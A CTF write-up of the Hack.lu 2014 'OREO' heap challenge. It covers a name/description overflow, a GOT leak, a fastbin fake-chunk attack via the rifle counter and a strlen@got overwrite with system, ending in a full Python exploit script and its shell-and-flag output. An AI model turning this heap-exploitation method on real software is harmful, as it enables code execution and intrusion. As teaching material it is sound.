OREO
Hack.lu CTF 2014 - Exploiting 400 points
you0708@YOKARO-MON
The Original Rifle Company has the most
finest rifles and revolvers in whole
Rodeo City! However their buildings are
pretty secure, so your only chance to get
into their offices is by hacking through
the Original Rifle Ecommerce Online
(OREO) System and steal all those pretty
weapons from the inside! Makes sense
right? Good luck!
nc wildwildweb.fluxfingers.net 1414
Welcome to the OREO Original Rifle Ecommerce Online System!
,______________________________________
|_________________,----------._ [____] -,__ __....-----=====
(_(||||||||||||)___________/ |
`----------' OREO [ ))"-, |
"" `, _,--....___ |
`/ """"
What would you like to do?
1. Add new rifle
2. Show added rifles
3. Order selected rifles
4. Leave a Message with your Order
5. Show current stats
6. Exit!
Action: 1
Rifle name: hogehoge
Rifle description: sample rifle
Action: 2
Rifle to be ordered:
===================================
Name: hogehoge
Description: sample rifle
===================================
Action:
Analysis
Surface Analysis
• file
• ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, stripped
• checksec
• CANARY : ENABLED
• FORTIFY : disabled
• NX : ENABLED
• PIE : disabled
• RELRO : disabled
Dynamic Analysis
• We can order rifles
1. Select rifles you want to order
• Need to specify rifle name & description
2. Submit an order for selected rifles
• Can leave a message
Static Analysis
• Reverse engineering using IDA
• Data structure of the rifle
• aa_rifle (Size = 0x38)
  Offset  Size  Name
  0x00    0x19  description
  0x19    0x1B  name
  0x34    4     last
Fastbins
Reference: Heap Chunk
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
Understanding Rifle Management using GDB
• After adding 2 rifles
• After order: size + flag, fd, bk
• 0x0804A288 stores the address of the last rifle
• After adding 2 rifles

  Heap
  Chunk 2 (Rifle 2)                 Chunk 1 (Rifle 1)
    0x00000041 (size + flag)          0x00000041 (size + flag)
    (prev size)                       (prev size)
    description                       description
    name                              name
    last = address of Rifle 1         last = 0

• After order (both chunks freed into the fastbin)

  Heap
  Chunk 2                           Chunk 1
    0x00000041 (size + flag)          0x00000041 (size + flag)
    (prev size)                       (prev size)
    0x00000000 (fd)                   address of Chunk 2 (fd)
    0x00000000 (bk)                   0x00000000 (bk)
Vulnerability
• Add command
  1. Alloc 0x38 bytes of heap (new rifle)
  2. Connect to previous rifle
  3. Input rifle's name (max 0x38 bytes)
  4. Input rifle's description (max 0x38 bytes)
  5. Add rifle counter
• Both inputs are limited by the size of the whole struct (0x38), although name is only 0x1B bytes and description only 0x19, so you can do a buffer-overflow as below
  - A name of "A" * 0x38 overwrites last (and runs on past the end of the rifle):
      Rifle:  description | name | last
                           |<---- "A" * 0x38 ---->
  - Or a description of "A" * 0x38 overwrites name and last:
      Rifle:  description | name | last
              |<------- "A" * 0x38 ------->
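To see why the 0x38-byte limit matters, here is an added C model (not the challenge binary's code) of the rifle record with a name read bounded only by the struct size beside one bounded by the field itself; the two adjacent 0x40-byte chunks, the sentinel value of last and the 0x41 size field are constructed to match the tables above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Rifle record as reconstructed on the slides (0x38 bytes, 32-bit pointer). */
struct aa_rifle {
    char     description[0x19];
    char     name[0x1B];
    uint32_t last;              /* address of the previously added rifle */
};

/* Constructed model of two adjacent 0x40-byte chunks: 8-byte header
 * (prev_size, size|flags), then user data. Chunk 1's rifle starts at
 * offset 8; chunk 2's size field sits at offset 0x44. */
#define CHUNK    0x40
#define HDR      8
#define SIZE_OFF (CHUNK + 4)
#define SENTINEL 0x0804A2A8u    /* constructed value for "last" */

/* Vulnerable read: the limit is the whole struct (0x38), so a long name
 * runs past "last" and into the next chunk's header. */
static void read_unbounded(unsigned char *field, const char *in) {
    size_t n = strlen(in);
    if (n > sizeof(struct aa_rifle)) n = sizeof(struct aa_rifle);
    memcpy(field, in, n);
}

/* Hardened read: limit is the field's own size, NUL kept, overlong input refused. */
static int read_bounded(unsigned char *field, size_t cap, const char *in) {
    size_t n = strlen(in);
    if (n >= cap) return -1;
    memcpy(field, in, n + 1);
    return 0;
}

/* Write a name of len 'A's; returns 1 if "last" and chunk 2's size survived. */
int name_write_is_safe(int bounded, size_t len) {
    unsigned char heap[2 * CHUNK];
    char in[sizeof(struct aa_rifle) + 1];
    if (len > sizeof(struct aa_rifle)) return -1;
    memset(in, 'A', len); in[len] = '\0';
    memset(heap, 0, sizeof heap);
    uint32_t last = SENTINEL, size = 0x41;
    memcpy(heap + HDR + offsetof(struct aa_rifle, last), &last, 4);
    memcpy(heap + SIZE_OFF, &size, 4);
    unsigned char *name = heap + HDR + offsetof(struct aa_rifle, name);
    if (bounded) read_bounded(name, sizeof(((struct aa_rifle *)0)->name), in);
    else         read_unbounded(name, in);
    memcpy(&last, heap + HDR + offsetof(struct aa_rifle, last), 4);
    memcpy(&size, heap + SIZE_OFF, 4);
    return last == SENTINEL && size == 0x41;
}

int rifle_layout_matches_slides(void) {
    return offsetof(struct aa_rifle, description) == 0x00 &&
           offsetof(struct aa_rifle, name) == 0x19 &&
           offsetof(struct aa_rifle, last) == 0x34 &&
           sizeof(struct aa_rifle) == 0x38;
}
```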
Exploitation
Memory Leakage
• Overwrite the last rifle address: a name of "A" * 0x1B + address of target data overflows into last
• The show command follows last and prints each rifle's description, so you can read the target data as a rifle's description

  Heap
  Chunk 1 (Rifle 1)
    0x41 (size + flag)
    (prev size)
    description
    name = "A" * 0x1B + address of target data
    last -> Target data
Fastbins Unlink Attack
• Breaking the fastbins chain: add a rifle after freeing 2 rifles

  Heap (values as drawn on the slide)
  Chunk 2 (freed):         0x42 (size + flag), (prev size), address of Chunk 1 (fd), bk
  Chunk 1 (reallocated):   0x41 (size + flag), (prev size), Rifle 3: description, name, last = 0
  Rifle 3's name:          "A" * 0x1F + 0 + 0 + 0x41 + address of target memory
  Target memory:           it is used as a heap chunk after Chunk 2 is re-allocated

Reference: Fastbins Unlink Attack
• http://www.slideshare.net/bata_24/katagaitai-ctf-1-57598200
• To avoid size check failure, you have to put a correct value into "size" (in this case, the value must be 0x41)
Making Fake Freed Chunk
• You have to find an area that can be set to 0x41 at the time of re-allocation

  Chunk
    0x41 (size + flag)
    (prev size)
    fd
    bk

• You can use 0x804A2A0 as a freed chunk, because rifle_counter (which lands in the size field) can be set to 0x41
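An added C model (not glibc's code or the author's script) of the 32-bit fastbin pop together with glibc's check that the victim chunk's size field belongs to the bin being served, using constructed chunk addresses; it shows why the counter slot that doubles as the fake chunk's size must read 0x41 (any value whose masked size is 0x40) before that memory can be handed out, and that any other counter value stops the allocation with the "memory corruption (fast)" abort.

```c
#include <stdint.h>
#include <string.h>

/* Constructed model of a 32-bit glibc fastbin (SIZE_SZ == 4): a chunk is
 * prev_size, size|flags, then fd at user-data offset 0. "mem" stands in
 * for the address space and offsets into it play the role of addresses. */
#define MEM_SIZE 0x100
static unsigned char mem[MEM_SIZE];

static uint32_t rd(uint32_t a)             { uint32_t v; memcpy(&v, mem + a, 4); return v; }
static void     wr(uint32_t a, uint32_t v) { memcpy(mem + a, &v, 4); }

#define CHUNKSIZE(s)     ((s) & ~7u)               /* strip the 3 flag bits */
#define FASTBIN_INDEX(s) ((CHUNKSIZE(s) >> 3) - 2) /* 32-bit fastbin_index() */

/* Fastbin pop as _int_malloc does it: take the head chunk, but only if its
 * size field maps to the bin being served; otherwise glibc aborts with
 * "malloc(): memory corruption (fast)" (modelled here as returning 0). */
uint32_t fastbin_pop(uint32_t *head, uint32_t chunk_size) {
    uint32_t victim = *head;
    if (victim == 0) return 0;                               /* bin empty */
    if (FASTBIN_INDEX(rd(victim + 4)) != FASTBIN_INDEX(chunk_size))
        return 0;                                            /* check fires */
    *head = rd(victim + 8);                                  /* head = victim->fd */
    return victim;
}

/* Scenario from the slides with constructed addresses: two genuine freed
 * 0x40 chunks, the second one's fd pointing at a "fake" chunk whose size
 * slot is the rifle counter. Returns how many pops succeed. */
int allocations_before_abort(uint32_t counter_value) {
    const uint32_t c1 = 0x10, c2 = 0x50, fake = 0xA0;
    memset(mem, 0, sizeof mem);
    wr(c1 + 4, 0x41); wr(c1 + 8, c2);        /* chunk 1: size 0x41, fd -> chunk 2 */
    wr(c2 + 4, 0x41); wr(c2 + 8, fake);      /* chunk 2: size 0x41, fd -> fake   */
    wr(fake + 4, counter_value);             /* fake "size" = rifle counter      */
    wr(fake + 8, 0);                         /* fake->fd = 0, end of the list    */
    uint32_t head = c1;
    int n = 0;
    while (fastbin_pop(&head, 0x40) != 0) n++;   /* malloc(0x38) -> 0x40 chunk */
    return n;
}
```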
Exploitation Process
1. Leak address of libc functions
2. Calc address of "system"
3. Add rifles until rifle counter is 0x3F
4. Order rifles (free fastbins)
5. Break the fastbins chain by adding a rifle
6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
7. Overwrite GOT by leaving a message
8. Get shell

Step 2. Calc address of "system"
• See http://pastebin.com/9vq38BYH

Steps 3-4. Add rifles until rifle counter is 0x3F, then order rifles (free fastbins)
  while rifle_count < 0x3e:
      cmd_add("A"*27+p(0), "B")
      cmd_add("A", "B")
      cmd_order()
• To avoid creating many fast chunks, "last" should be 0x00000000

Step 6. Allocate 0x804A2A0 as a heap chunk by adding a rifle
• Before allocation, rifle counter will be 0x41
• Its description must be the address of strlen@got
  Address    Before          After        Value
  0x804A2A0  orderd_counter  prev_size    0x00000000
  0x804A2A4  rifle_counter   size + flag  0x00000041
  0x804A2A8  lpMsg           description  address of strlen@got
  0x804a2c1  msg_buf + 1     name         "foobar"
  0x804a2dc  msg_buf + 0x1C  last         Unknown
• strlen@got will be called by the program after adding a rifle / leaving a message

Step 7. Overwrite strlen@got by leaving a message
• Now lpMsg points to strlen@got
• Message should be p(libc_system) + ";sh\x00"
• ";sh\x00" will be used in the next step

Step 8. Get shell
• The overwritten strlen will be called after adding the rifle
• Its argument is the message: p(libc_system) + ";sh\x00"
• It means the program will call system("\x??\x??\x??\x??;sh")
oreo.py
# helpers sock, p, u, ready_action, cmd_add(name, description), cmd_show,
# cmd_order, cmd_msg and shell come from the author's script and are not
# shown on the slide; the loop below relies on cmd_add updating rifle_count
s, f = sock("wildwildweb.fluxfingers.net", 1414)
got_malloc = 0x0804A244
got_strlen = 0x0804A250
p_order_msg = 0x0804A2A8
rifle_count = 0
ready_action()
# 1. leak: the name overflow points "last" 0x19 bytes before malloc@got,
#    so the "description" of that fake rifle is the GOT entry itself
cmd_add("A"*27+p(got_malloc-0x19), "B"*25)
libc_malloc = u(cmd_show()[1][0][:4])
print("[*] got libc malloc: 0x%08x" % libc_malloc)
# 2. system = malloc - offset(malloc) + offset(system) in the remote libc
libc_system = libc_malloc - 0x0007d950 + 0x00042af0
print("[*] got libc system: 0x%08x" % libc_system)
# 3-4. raise the rifle counter to 0x3F, freeing two fastbin chunks per round
while rifle_count < 0x3e:
    cmd_add("A"*27+p(0), "B")
    cmd_add("A", "B")
    cmd_order()
# 5. break the fastbins chain: overflow into the next chunk's prev_size,
#    size (0x41) and fd (fake chunk at 0x804A2A0); counter becomes 0x40
cmd_add("A"*27+p(0)+p(0)+p(0x41)+p(p_order_msg-8), "B")
cmd_add("A", "B")          # counter becomes 0x41 = size of the fake chunk
# 6. allocate 0x804A2A0: the description lands in lpMsg -> strlen@got
cmd_add("A", p(got_strlen))
# 7-8. the message is written over strlen@got; the next strlen call runs system()
cmd_msg(p(libc_system) + ";sh\x00", noread=True)
print("[*] got shell")
shell(s)
$ python oreo.py
[*] rifle count: 0x01
[*] got libc malloc: 0xf76a2950
[*] got libc system: 0xf7667af0
[*] rifle count: 0x02
[*] rifle count: 0x03
(snip.)
[*] rifle count: 0x3f
[*] ordered
[*] rifle count: 0x40
[*] rifle count: 0x41
[*] rifle count: 0x42
[*] got shell
ls
fl4g oreo
cat fl4g
flag{FASTBINS_ARE_NICE_ARENT_THEY}
Thank you!
